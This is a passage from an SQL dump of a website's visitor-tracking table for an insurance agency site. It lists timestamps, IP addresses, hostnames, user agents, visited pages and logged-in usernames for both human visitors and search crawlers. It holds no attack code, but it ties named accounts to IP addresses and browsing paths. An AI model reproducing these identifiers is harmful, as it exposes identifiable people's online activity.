Safari/537.36','http://www.empireins.com/licensing-contracting/?preview=true&preview_id=306&preview_nonce=74669b15d8','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','51',0),(388,'0b_1b8cd993de2d7dfae4b6c7860678d0c7','1457039469','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','51',0),(389,'0b_1b8cd993de2d7dfae4b6c7860678d0c7','1457039472','108.58.88.178','ool-6c3a58b2.static.optonline.net','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','51',0),(391,'0b_1b8cd993de2d7dfae4b6c7860678d0c7','1457039485','108.58.88.178','ool-6c3a58b2.static.optonline.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','51',0),(392,'0b_1b8cd993de2d7dfae4b6c7860678d0c7','1457039498','108.58.88.178','ool-6c3a58b2.static.optonline.net','/licensing-contracting/?preview=true&preview_id=306&preview_nonce=74669b15d8','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','51',0),(395,'0b_f27619aaf36d7adfed05c96ff1bce7b5','1457039530','180.76.15.161','baiduspider-180-76-15-161.crawl.baidu.com','/igo/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(398,'0b_ca06dbdda8c1a83240791cdba85c2469','1457039755','75.99.37.250','ool-4b6325fa.static.optonline.net','/feed/','Mozilla/5.0 (compatible; Google Desktop/5.9.911.3589; http://desktop.google.com/)','','',0,'','','','','','Google','','','','0','0',0),(400,'0b_152a1f51b95e122fc52104be15a50ba9','1457039779','69.58.178.59','69.58.178.59','/robots.txt','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(401,'0b_152a1f51b95e122fc52104be15a50ba9','1457039826','69.58.178.59','69.58.178.59','/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(403,'0b_152a1f51b95e122fc52104be15a50ba9','1457039949','69.58.178.59','69.58.178.59','/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','','','','','0','0',0),(404,'0b_152a1f51b95e122fc52104be15a50ba9','1457039996','69.58.178.59','69.58.178.59','/about-us/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','','','','','0','0',0),(406,'0b_152a1f51b95e122fc52104be15a50ba9','1457040043','69.58.178.59','69.58.178.59','/contact/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','','','','','0','0',0),(409,'0b_152a1f51b95e122fc52104be15a50ba9','1457040087','69.58.178.59','69.58.178.59','/agent-tools/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','','','','','0','0',0),(412,'0b_152a1f51b95e122fc52104be15a50ba9','1457040132','69.58.178.59','69.58.178.59','/register/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','','','','','0','0',0),(415,'0b_152a1f51b95e122fc52104be15a50ba9','1457040179','69.58.178.59','69.58.178.59','/insentives/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','','','','','0','0',0),(416,'0b_152a1f51b95e122fc52104be15a50ba9','1457040223','69.58.178.59','69.58.178.59','/licensing-contracting/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','','','','','0','0',0),(418,'0b_152a1f51b95e122fc52104be15a50ba9','1457040265','69.58.178.59','69.58.178.59','/carriers/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','','','','','0','0',0),(419,'0b_152a1f51b95e122fc52104be15a50ba9','1457040304','69.58.178.59','69.58.178.59','/case-status/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','','','','','0','0',0),(422,'0b_152a1f51b95e122fc52104be15a50ba9','1457040343','69.58.178.59','69.58.178.59','/forms/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','','','','','0','0',0),(425,'0b_1907bcd830dc64f73a23ddbcf456f5f5','1457040414','96.224.199.60','pool-96-224-199-60.nycmny.fios.verizon.net','/wp-admin/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'WinVista','Chrome 48','us','','','','','','','0','0',0),(428,'0b_1b8cd993de2d7dfae4b6c7860678d0c7','1457040456','108.58.88.178','ool-6c3a58b2.static.optonline.net','/licensing-contracting/?preview=true&preview_id=306&preview_nonce=74669b15d8','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/wp-admin/post.php?post=306&action=edit&message=1','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','51',0),(430,'0b_fcd7797076734ffa6a3597c3da533bf3','1457040607','66.249.83.217,108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google Favicon','','',0,'Win7','Firefox 6','','','','','','','','0','0',0),(433,'0b_09bbe1da927891562718e2656ee77df6','1457040756','91.194.84.106','f481.fuchsia.fastwebserver.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(436,'0b_09bbe1da927891562718e2656ee77df6','1457040763','91.194.84.106','f481.fuchsia.fastwebserver.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(437,'0b_397ef0321bbdad4c9522e081c978e3c7','1457040825','40.77.167.33','msnbot-40-77-167-33.search.msn.com','/resources.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(440,'0b_397ef0321bbdad4c9522e081c978e3c7','1457040850','40.77.167.33','msnbot-40-77-167-33.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(443,'0b_397ef0321bbdad4c9522e081c978e3c7','1457040851','40.77.167.33','msnbot-40-77-167-33.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(445,'0b_397ef0321bbdad4c9522e081c978e3c7','1457040852','40.77.167.33','msnbot-40-77-167-33.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(446,'0b_b48e065784028b7ae65535a2a709fc41','1457041077','75.99.37.250','ool-4b6325fa.static.optonline.net','/feed/','Mozilla/5.0 (compatible; Google Desktop/5.9.911.3589; http://desktop.google.com/)','','',0,'','','','','','Google','','','','0','0',0),(449,'0b_b6343a227384c29a6dd7f53883d62b38','1457041409','75.99.148.62','ool-4b63943e.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(452,'0b_b6343a227384c29a6dd7f53883d62b38','1457041410','75.99.148.62','ool-4b63943e.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(455,'0b_b6343a227384c29a6dd7f53883d62b38','1457041414','75.99.148.62','ool-4b63943e.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(457,'0b_b6343a227384c29a6dd7f53883d62b38','1457041425','75.99.148.62','ool-4b63943e.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1280 x 1024','','','','joel10950','','0','51',0),(460,'0b_1b8cd993de2d7dfae4b6c7860678d0c7','1457041598','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','51',0),(463,'0b_1b8cd993de2d7dfae4b6c7860678d0c7','1457041599','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','0',0),(466,'0b_2f9e820c343475e33e61f5cc5c0004f5','1457041655','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win8','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(467,'0b_2f9e820c343475e33e61f5cc5c0004f5','1457041655','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(470,'0b_2f9e820c343475e33e61f5cc5c0004f5','1457041658','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(473,'0b_2f9e820c343475e33e61f5cc5c0004f5','1457041676','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 48','us','1920 x 1080','','','','Shmuli','','0','51',0),(476,'0b_5254cec7a43ad929721da4d3f415260d','1457044821','10.30.78.104','10.30.78.104','/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)','','',0,'Win7 x64','IE 8','','','','','','','','0','0',0),(479,'0b_69c2f5550810f27de33dbae383d96494','1457045174','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(482,'0b_53d81e233a5a183fffe3ab19525120cc','1457048103','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(484,'0b_d401e2cc3ecd1acfd087477542deb89b','1457048624','50.108.150.57','50.108.150.57','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(485,'0b_d401e2cc3ecd1acfd087477542deb89b','1457048635','50.108.150.57','50.108.150.57','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(487,'0b_d401e2cc3ecd1acfd087477542deb89b','1457048663','50.108.150.57','50.108.150.57','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(488,'0b_d401e2cc3ecd1acfd087477542deb89b','1457048678','50.108.150.57','50.108.150.57','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(491,'0b_58dde7ef4ccb383b7b0c1771c929b127','1457049154','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(493,'0b_d401e2cc3ecd1acfd087477542deb89b','1457049219','50.108.150.57','50.108.150.57','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(494,'0b_d401e2cc3ecd1acfd087477542deb89b','1457049230','50.108.150.57','50.108.150.57','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(497,'0b_d401e2cc3ecd1acfd087477542deb89b','1457049280','50.108.150.57','50.108.150.57','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(500,'0b_44e9ba68406f13c2a1adc8b961b82590','1457051455','141.8.143.242','spider-141-8-143-242.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(503,'0b_2bc0ff157c8a6d7965286de98efe4d84','1457051455','100.43.91.1','spider-100-43-91-1.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(506,'0b_5a6c1a73f252738981ec98052156cc81','1457051456','141.8.143.175','spider-141-8-143-175.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(509,'0b_2bc0ff157c8a6d7965286de98efe4d84','1457051456','100.43.91.15','spider-100-43-91-15.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(512,'0b_1865dcd4c2ad0487b72f471926c3ea1f','1457051460','100.43.85.8','spider-100-43-85-8.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(514,'0b_76dca969d5d4b48fc226504005442701','1457053052','74.89.21.36','ool-4a591524.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1280 x 720','','','','','','0','0',0),(515,'0b_76dca969d5d4b48fc226504005442701','1457053054','74.89.21.36','ool-4a591524.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1280 x 720','','','','','','0','0',0),(518,'0b_76dca969d5d4b48fc226504005442701','1457053073','74.89.21.36','ool-4a591524.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1280 x 720','','','','','','0','0',0),(521,'0b_76dca969d5d4b48fc226504005442701','1457053093','74.89.21.36','ool-4a591524.dyn.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1280 x 720','','','','Shmuli','','0','51',0),(524,'0b_76dca969d5d4b48fc226504005442701','1457053114','74.89.21.36','ool-4a591524.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1280 x 720','','','','Shmuli','','0','51',0),(526,'0b_81f0a84febfd6966f1a32b52f10306df','1457053538','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(527,'0b_f796f33407882ed46287aeff7e54f5db','1457053989','74.89.21.36','ool-4a591524.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','','',0,'Win8','Chrome 47','us','1280 x 720','','','','Shmuli','','0','0',0),(529,'0b_f796f33407882ed46287aeff7e54f5db','1457053991','74.89.21.36','ool-4a591524.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 47','us','1280 x 720','','','','Shmuli','','0','0',0),(532,'0b_f796f33407882ed46287aeff7e54f5db','1457054030','74.89.21.36','ool-4a591524.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 47','us','1280 x 720','','','','Shmuli','','0','0',0),(535,'0b_f796f33407882ed46287aeff7e54f5db','1457054037','74.89.21.36','ool-4a591524.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','','',0,'Win8','Chrome 47','us','1280 x 720','','','','Shmuli','','0','51',0),(538,'0b_f796f33407882ed46287aeff7e54f5db','1457054038','74.89.21.36','ool-4a591524.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 47','us','1280 x 720','','','','Shmuli','','0','0',0),(539,'0b_f796f33407882ed46287aeff7e54f5db','1457054041','74.89.21.36','ool-4a591524.dyn.optonline.net','/register/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 47','us','1280 x 720','','','','Shmuli','','0','51',0),(541,'0b_f796f33407882ed46287aeff7e54f5db','1457054047','74.89.21.36','ool-4a591524.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','http://www.empireins.com/register/','',0,'Win8','Chrome 47','us','1280 x 720','','','','Shmuli','','0','51',0),(542,'0b_f796f33407882ed46287aeff7e54f5db','1457054054','74.89.21.36','ool-4a591524.dyn.optonline.net','/register/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 47','us','1280 x 720','','','','Shmuli','','0','51',0),(545,'0b_f796f33407882ed46287aeff7e54f5db','1457054336','74.89.21.36','ool-4a591524.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','','',0,'Win8','Chrome 47','us','1280 x 720','','','','Shmuli','','0','51',0),(548,'0b_f796f33407882ed46287aeff7e54f5db','1457054337','74.89.21.36','ool-4a591524.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 47','us','1280 x 720','','','','Shmuli','','0','0',0),(550,'0b_f796f33407882ed46287aeff7e54f5db','1457054340','74.89.21.36','ool-4a591524.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 47','us','1280 x 720','','','','Shmuli','','0','51',0),(551,'0b_58ab9d8a023d1ba182270a5bec1dc4c4','1457054352','74.89.21.36','ool-4a591524.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1280 x 720','','','','','','0','0',0),(554,'0b_58ab9d8a023d1ba182270a5bec1dc4c4','1457054353','74.89.21.36','ool-4a591524.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1280 x 720','','','','','','0','0',0),(556,'0b_58ab9d8a023d1ba182270a5bec1dc4c4','1457054411','74.89.21.36','ool-4a591524.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1280 x 720','','','','','','0','0',0),(559,'0b_58ab9d8a023d1ba182270a5bec1dc4c4','1457054412','74.89.21.36','ool-4a591524.dyn.optonline.net','/browserconfig.xml','Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1280 x 720','','','','','','0','0',0),(562,'0b_58ab9d8a023d1ba182270a5bec1dc4c4','1457054424','74.89.21.36','ool-4a591524.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1280 x 720','','','','Shmuli','','0','51',0),(563,'0b_58ab9d8a023d1ba182270a5bec1dc4c4','1457054435','74.89.21.36','ool-4a591524.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1280 x 720','','','','Shmuli','','0','51',0),(565,'0b_dc65d937484b63d076be5bc5147e73e9','1457055182','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(566,'0b_3bcc4da0826d91e0a5d8394194704ded','1457056716','157.55.39.236','msnbot-157-55-39-236.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(569,'0b_6c4f85bf4d7338674cdeec8f03cf55d8','1457056814','151.138.13.244','151.138.13.244','/','SuperPagesUrlVerifyBot/1.0','','',0,'','','','','','SuperPagesUrlVerifyBot','','','','0','0',0),(572,'0b_05766a51a03253fe3d3a9463bda1442b','1457058015','50.74.50.37','rrcs-50-74-50-37.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(575,'0b_05766a51a03253fe3d3a9463bda1442b','1457058016','50.74.50.37','rrcs-50-74-50-37.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(577,'0b_05766a51a03253fe3d3a9463bda1442b','1457058041','50.74.50.37','rrcs-50-74-50-37.nyc.biz.rr.com','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(578,'0b_05766a51a03253fe3d3a9463bda1442b','1457058043','50.74.50.37','rrcs-50-74-50-37.nyc.biz.rr.com','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(580,'0b_05766a51a03253fe3d3a9463bda1442b','1457058055','50.74.50.37','rrcs-50-74-50-37.nyc.biz.rr.com','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/contact/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(583,'0b_05766a51a03253fe3d3a9463bda1442b','1457058058','50.74.50.37','rrcs-50-74-50-37.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(586,'0b_05766a51a03253fe3d3a9463bda1442b','1457058061','50.74.50.37','rrcs-50-74-50-37.nyc.biz.rr.com','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(589,'0b_05766a51a03253fe3d3a9463bda1442b','1457058063','50.74.50.37','rrcs-50-74-50-37.nyc.biz.rr.com','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(590,'0b_05766a51a03253fe3d3a9463bda1442b','1457058066','50.74.50.37','rrcs-50-74-50-37.nyc.biz.rr.com','/about-us/','Mozilla/5.0 (Windows 